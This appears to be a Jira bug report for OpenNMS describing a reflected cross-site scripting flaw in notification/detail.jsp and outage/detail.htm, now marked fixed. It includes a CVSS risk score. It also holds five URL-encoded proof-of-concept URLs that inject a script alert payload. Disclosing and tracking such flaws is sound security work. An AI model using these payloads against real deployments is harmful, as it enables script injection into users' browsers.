Skip to:

  1. Skip to Jira Navigation
  2. Skip to Side Navigation
  3. Skip to Main Content

Reflected XSS vulnerability in notification/detail.jsp and outage/detail.htm

Description

The following URLs demonstrate the exploit by injecting a Javascript alert() pop-up:

http://localhost:8980/opennms/notification/detail.jsp?notice=12345%27%22%21%40%24%5e%2a%5c%2f%3a%3b%2e%2c%3f%7b%7d%5b%5d%60%7e%2d%5f%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%33%37%32%33%33%29%3c%2f%73%43%72%49%70%54%3e

http://localhost:8980/opennms/notification/detail.jsp?notice=12345%27%22%21%40%24%5e%2a%5c%2f%3a%3b%2e%2c%3f%7b%7d%5b%5d%60%7e%2d%5f%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%31%37%36%36%36%29%3c%2f%73%43%72%49%70%54%3e

http://localhost:8980/opennms/outage/detail.htm?id=12345%27%22%21%40%24%5e%2a%5c%2f%3a%3b%2e%2c%3f%7b%7d%5b%5d%60%7e%2d%5f%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%33%34%37%34%37%29%3c%2f%73%43%72%49%70%54%3e

http://localhost:8980/opennms/outage/detail.htm?id=12345%27%22%21%40%24%5e%2a%5c%2f%3a%3b%2e%2c%3f%7b%7d%5b%5d%60%7e%2d%5f%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%35%38%38%37%35%29%3c%2f%73%43%72%49%70%54%3e

http://localhost:8980/opennms/outage/detail.htm?id=12345%27%22%21%40%24%5e%2a%5c%2f%3a%3b%2e%2c%3f%7b%7d%5b%5d%60%7e%2d%5f%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%32%31%34%37%37%29%3c%2f%73%43%72%49%70%54%3e

 

Environment

See https://mynms.opennms.com/Ticket/Display.html?id=6091

Acceptance / Success Criteria

None

Lucidchart Diagrams

Activity

Show:

Gabriela Lopez January 31, 2023 at 7:49 PM

Information Security risk assessment:

CVSS 6.7 x med likelihood .8 = 5.4 Medium

AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N/E:P/RL:O/RC:C/CR:H/IR:H/AR:H/MAV:A/MAC:X/MPR:X/MUI:X/MS:X/MC:X/MI:X/MA:X

Jeff Gehlbach May 20, 2019 at 8:56 PM

Fixed

Details

Assignee

Reporter

Labels

Components

Fix versions

Affects versions

Priority

PagerDuty

Created May 20, 2019 at 8:46 PM
Updated January 31, 2023 at 7:49 PM
Resolved May 22, 2019 at 6:29 AM